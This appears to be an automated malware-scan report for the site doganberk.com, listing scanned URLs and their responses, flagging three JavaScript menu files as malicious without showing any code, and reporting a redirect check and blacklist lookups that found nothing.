Scanned pages/files
Request | Server response | Status |
http://doganberk.com/ | 200 OK Content-Length: 19393 Content-Type: text/html | clean |
http://doganberk.com/menu/chromejs/chrome.js | 200 OK Content-Length: 23952 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
Antivirus reports:
http://doganberk.com/jqueryslidemenu.js | 200 OK Content-Length: 14123 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
Antivirus reports:
http://doganberk.com/slidemenu.js | 200 OK Content-Length: 13157 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
Antivirus reports:
http://doganberk.com/default.asp | 200 OK Content-Length: 19393 Content-Type: text/html | clean |
http://doganberk.com/soru.asp | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
http://doganberk.com/test404page.js | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
http://doganberk.com/agca.asp | 200 OK Content-Length: 12894 Content-Type: text/html | clean |
http://doganberk.com/js/prototype.js | 200 OK Content-Length: 126132 Content-Type: application/x-javascript | clean |
http://doganberk.com/js/scriptaculous.js?load=effects,builder | 200 OK Content-Length: 2654 Content-Type: application/x-javascript | clean |
http://doganberk.com/js/lightbox.js | 200 OK Content-Length: 18389 Content-Type: application/x-javascript | clean |
http://doganberk.com/agca/1-1.jpg | 200 OK Content-Length: 280825 Content-Type: image/jpeg | clean |
http://doganberk.com/agca/2-2.jpg | 200 OK Content-Length: 262624 Content-Type: image/jpeg | clean |
http://doganberk.com/agca/3-3.jpg | 200 OK Content-Length: 282162 Content-Type: image/jpeg | clean |
http://doganberk.com/agca/4-4.jpg | 200 OK Content-Length: 272157 Content-Type: image/jpeg | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: doganberk.com
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Thu, 21 Aug 2014 08:18:22 GMT
Server: Microsoft-IIS/6.0
Content-Length: 19393
Content-Type: text/html
Set-Cookie: ASPSESSIONIDAASAATDQ=OJNDHKACFNBGFLIDPDALCJNB; path=/
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
...19393 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: doganberk.com
Referer: http://www.google.com/search?q=doganberk.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=doganberk.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://doganberk.com/
Result: doganberk.com is not infected or malware details are not published yet.